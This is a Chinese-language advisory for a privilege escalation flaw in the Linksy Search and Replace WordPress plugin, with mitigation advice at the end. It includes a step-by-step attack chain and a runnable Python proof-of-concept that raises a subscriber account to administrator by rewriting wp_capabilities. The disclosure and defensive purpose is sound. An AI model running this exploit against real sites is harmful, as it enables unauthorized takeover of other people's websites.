CVE-2026-2941 WordPress Linksy插件权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-2941

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linksy Search and Replace (WordPress Plugin)

漏洞概述

WordPress插件Linksy Search and Replace在1.0.4及以下版本中存在严重的权限提升漏洞。由于`linksy_search_and_replace_item_details`函数未实施足够的能力检查，经过身份验证的攻击者（仅需订阅者权限）即可利用该漏洞更新数据库中的任意表和字段。攻击者可利用此漏洞修改`wp_capabilities`字段，将自身角色提升为管理员，从而完全接管WordPress站点。该漏洞CVSS评分为8.8，属于高危漏洞，建议尽快升级。

技术细节

该漏洞的根源在于插件代码中的访问控制机制失效。在受影响版本的`AjaxActions.php`文件中，`linksy_search_and_replace_item_details`函数作为AJAX处理程序，负责处理数据库更新请求。然而，该函数在执行数据库操作前，未调用`current_user_can()`等函数来验证用户是否具备管理数据库或修改特定数据的权限。利用该漏洞的攻击链如下：首先，攻击者注册一个低权限账户（如订阅者）。接着，攻击者向WordPress后台发送特制的POST请求，触发存在缺陷的AJAX动作。在请求参数中，攻击者不局限于常规的搜索替换操作，而是直接指定目标数据库表为`wp_usermeta`（存储用户权限的表），并指定目标字段为`wp_capabilities`。通过构造恶意的更新数据，攻击者将该字段的值修改为包含管理员权限的序列化字符串（如`a:1:{s:13:"administrator";b:1;}`）。由于服务器端缺乏校验，数据库直接执行了更新操作，攻击者随后刷新页面或重新登录，即获得管理员权限。

攻击链分析

STEP 1

1. 信息收集与注册

攻击者侦查目标站点是否安装Linksy Search and Replace插件，并注册一个低权限（如订阅者Subscriber）账户。

STEP 2

2. 身份验证

攻击者使用低权限账户登录WordPress后台，获取有效的会话Cookie（WordPress_logged_in_xxx）。

STEP 3

3. 发起恶意请求

攻击者构造特制的HTTP POST请求发送到`/wp-admin/admin-ajax.php`，利用`linksy_search_and_replace_item_details`动作，参数中指定修改`wp_usermeta`表。

STEP 4

4. 权限提升

服务器端因缺少权限校验，直接执行数据库更新操作，将攻击者账户的`wp_capabilities`值修改为管理员权限序列化数据。

STEP 5

5. 完全控制

攻击者重新登录或刷新页面，获得管理员权限，进而上传WebShell、篡改页面或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
username = "subscriber"
password = "password"
attacker_user_id = 2 # Replace with the actual user ID of the attacker

# 1. Authenticate to obtain a session cookie
session = requests.Session()
login_payload = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': 'http://example.com/wp-admin'
}
session.post("http://example.com/wp-login.php", data=login_payload)

# 2. Exploit the vulnerability to update wp_capabilities
# The vulnerability allows updating any table. We target wp_usermeta to escalate privileges.
exploit_payload = {
    'action': 'linksy_search_and_replace_item_details', # The vulnerable AJAX action
    'table_name': 'wp_usermeta',
    'primary_key': 'user_id',
    'primary_key_value': attacker_user_id,
    'field_name': 'meta_key', # Targeting the capability key
    'field_value': 'wp_capabilities',
    # Serialized data for Administrator role
    'new_value': 'a:1:{s:13:"administrator";b:1;}'
}

try:
    response = session.post(target_url, data=exploit_payload)
    if response.status_code == 200:
        print("[+] Request sent successfully. Attempting privilege escalation...")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Linksy Search and Replace <= 1.0.4

防御指南

临时缓解措施

在未升级插件前，建议暂时移除该插件目录以阻断攻击面。同时，检查数据库中`wp_usermeta`表，确认是否存在异常的权限修改记录，并将非预期的管理员账户降权或删除。